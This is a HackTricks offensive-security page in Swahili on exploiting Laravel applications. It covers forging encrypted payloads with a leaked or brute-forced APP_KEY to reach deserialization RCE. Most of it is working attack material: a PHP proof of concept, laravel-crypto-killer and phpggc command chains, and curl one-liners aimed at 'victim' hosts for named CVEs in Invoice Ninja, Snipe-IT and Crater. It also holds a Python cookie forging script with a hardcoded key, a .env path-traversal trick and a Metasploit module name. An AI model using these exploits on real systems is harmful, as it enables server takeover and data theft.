HackTricksLaravel
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Laravel SQLInjection
Soma habari kuhusu hii hapa: https://stitcher.io/blog/unsafe-sql-functions-in-laravel
APP_KEY & Msingi wa Uthibitishaji (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC uaminifu chini ya uso (Illuminate\\Encryption\\Encrypter).
Ciphertext ya raw ambayo hatimaye inatumwa kwa mteja ni Base64 ya kitu cha JSON kama:
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
encrypt($value, $serialize=true) itafanya serialize() maandiko ya wazi kwa chaguo-msingi, wakati decrypt($payload, $unserialize=true) itautumia kiotomatiki unserialize() thamani iliyofichwa. Hivyo basi mshambuliaji yeyote anayejua siri ya byte 32 APP_KEY anaweza kuunda kitu kilichofichwa cha PHP kilichosajiliwa na kupata RCE kupitia mbinu za kichawi (__wakeup, __destruct, …).
Minimal PoC (framework ≥9.x):
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
Ingiza mfuatano uliozalishwa kwenye chochote kilicho hatarini decrypt() sink (paramu ya njia, cookie, kikao, …).
laravel-crypto-killer 🧨
laravel-crypto-killer inaweka mchakato mzima kuwa otomatiki na kuongeza hali rahisi ya bruteforce:
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
The script inasaidia kwa uwazi payloads za CBC na GCM na inarejesha uwanja wa HMAC/tag.
Mifano halisi ya udhaifu
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|---|---|---|
| Invoice Ninja ≤v5 (CVE-2024-55555) | /route/{hash} → decrypt($hash) | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | XSRF-TOKEN cookie wakati Passport::withCookieSerialization() imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | SESSION_DRIVER=cookie → laravel_session cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
- Pata au fanya brute-force ya
APP_KEYya byte 32. - Jenga mnyororo wa gadget na PHPGGC (kwa mfano
Laravel/RCE13,Laravel/RCE9auLaravel/RCE15). - Ficha gadget iliyosajiliwa na laravel_crypto_killer.py na
APP_KEYiliyopatikana. - Toa ciphertext kwa sink iliyo hatarini
decrypt()(parameta ya route, cookie, session …) ili kuanzisha RCE.
Hapa chini kuna mistari mifupi inayoonyesha njia kamili ya shambulio kwa kila CVE halisi iliyotajwa hapo juu:
# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"
# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
Ugunduzi wa APP_KEY wa Misa kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (XSRF-TOKEN na kawaida laravel_session), scanner za umma za mtandao (Shodan, Censys, …) zinatoa mamilioni ya ciphertexts ambazo zinaweza kushambuliwa bila mtandao.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
- Dataset Julai 2024 » 580 k tokens, 3.99 % ya funguo zimevunjwa (≈23 k)
- Dataset Mei 2025 » 625 k tokens, 3.56 % ya funguo zimevunjwa
-
1 000 seva bado zina hatari kutokana na CVE-2018-15133 ya zamani kwa sababu tokens zina data iliyosimbwa moja kwa moja.
- Matumizi makubwa ya funguo – APP_KEYs 10 bora zimeandikwa kwa defaults ambazo zinakuja na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go nounours inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza uvunjaji wa dataset kamili hadi <2 dakika.
Hila za Laravel
Hali ya Ukarabati
Ikiwa Laravel iko katika hali ya ukarabati utaweza kufikia kod na data nyeti.
Kwa mfano http://127.0.0.1:8000/profiles:
.png)
Hii kwa kawaida inahitajika kwa ajili ya kutumia CVEs nyingine za RCE za Laravel.
.env
Laravel huhifadhi APP inayotumia kusimbua cookies na akreditivu nyingine ndani ya faili inayoitwa .env ambayo inaweza kufikiwa kwa kutumia njia fulani ya kupita: /../.env
Laravel pia itaonyesha habari hii ndani ya ukurasa wa ukarabati (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Kwa kutumia APP_KEY ya siri ya Laravel unaweza kusimbua na kusimbua tena cookies:
Futa Cookie
import os
import json
import hashlib
import sys
import hmac
import base64
import string
import requests
from Crypto.Cipher import AES
from phpserialize import loads, dumps
#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3
def mcrypt_decrypt(value, iv):
global key
AES.key_size = [len(key)]
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
return crypt_object.decrypt(value)
def mcrypt_encrypt(value, iv):
global key
AES.key_size = [len(key)]
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
return crypt_object.encrypt(value)
def decrypt(bstring):
global key
dic = json.loads(base64.b64decode(bstring).decode())
mac = dic['mac']
value = bytes(dic['value'], 'utf-8')
iv = bytes(dic['iv'], 'utf-8')
if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
#return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
return ''
def encrypt(string):
global key
iv = os.urandom(16)
#string = dumps(string)
padding = 16 - len(string) % 16
string += bytes(chr(padding) * padding, 'utf-8')
value = base64.b64encode(mcrypt_encrypt(string, iv))
iv = base64.b64encode(iv)
mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
key = base64.b64decode(app_key)
decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9')
#b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')
Laravel Deserialization RCE
Tofauti zinazoweza kutumika: 5.5.40 na 5.6.x kupitia 5.6.29 (https://www.cvedetails.com/cve/CVE-2018-15133/)
Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization hapa: https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/
Unaweza kujaribu na kutumia kwa kutumia https://github.com/kozmic/laravel-poc-CVE-2018-15133
Au unaweza pia kutumia metasploit: use unix/http/laravel_token_unserialize_exec
CVE-2021-3129
Udhaifu mwingine wa deserialization: https://github.com/ambionics/laravel-exploits
References
- Laravel: APP_KEY leakage analysis (EN)
- Laravel : analyse de fuite d’APP_KEY (FR)
- laravel-crypto-killer
- PHPGGC – PHP Generic Gadget Chains
- CVE-2018-15133 write-up (WithSecure)
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.